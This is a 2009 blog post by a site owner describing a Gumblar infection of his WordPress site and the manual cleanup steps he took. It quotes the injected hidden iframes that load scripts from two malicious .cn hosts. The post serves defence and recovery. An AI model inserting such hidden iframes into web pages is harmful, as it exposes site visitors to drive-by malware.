Yesterday one of my websites got infected by a suspicious malware gumblar.cn. This website contains several exploits and trojans that can harm your system. How it starts its infection is to invoke Adobe Acrobat Reader on your machine. I found after browsing my infected site, Acrobat Reader process was running in Task Manager.

According to Google Safe Browsing Service

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-05, and the last time suspicious content was found on this site was on 2009-05-05.
Malicious software includes 2341 scripting exploit(s), 6 trojan(s).

This site was hosted on 1 network(s) including AS42831 (UKSERVERS).

I found some of php files were altered by adding a iframe at the end of the page. My infected files were <my-url>/wp-content/themes/<my-theme-dir>/index.php and <my-url>/wp-admin/index.php and in same directory index-extra.php. I didnt found any other file which was infected by this.

I manually removed this embedded iframe  <iframe src=”http://liteautotop .cn/ts/in.cgi?mozila” width=2 height=4 style=”visibility: hidden”></iframe>  and every things works fine.

If you have some type of information about this infection, people will highly appriciate who are messing arround the internet about the solution of this problem.

Update (5/11/09): I am able to remove this malware from my blog and Wordpress admin site.

Removal

• Removed image.php file from all images folder. image.php infection only found in ‘image’ folder. Make sure you didn’t remove the orignal image.php file. If your orignal file infected, only remove malicious code
• Looked for iframe code added on the top or bottom of php page and remove it. I found this iframe which I removed. <iframe src=”http: //bigtruckstopseek .cn/ts/in.cgi?banner2″ width=2 height=4 style=”visibility: hidden”>
• Checked all PHP, HTML and JS  files for added anonymous Java Script methods. I found all JS files infected in wp-include directory
• Put httpdoc directory permission to 755
• Scaned my computer with Malwarebytes’ Anti-Malware, which identified several threats and removed
• Updated my AVG Anti Virus
• Changed my FTP password
• I did all this manual code removal activity from my Pleask control panel

Please fell free to make comment and your suggestions to make more security measures to prevent such threats.

Related posts:

1. How to make an executeable jar
2. How to solve image upload problem in wordpress blog
3. Pakzilla.com was down. Sorry for inconvenience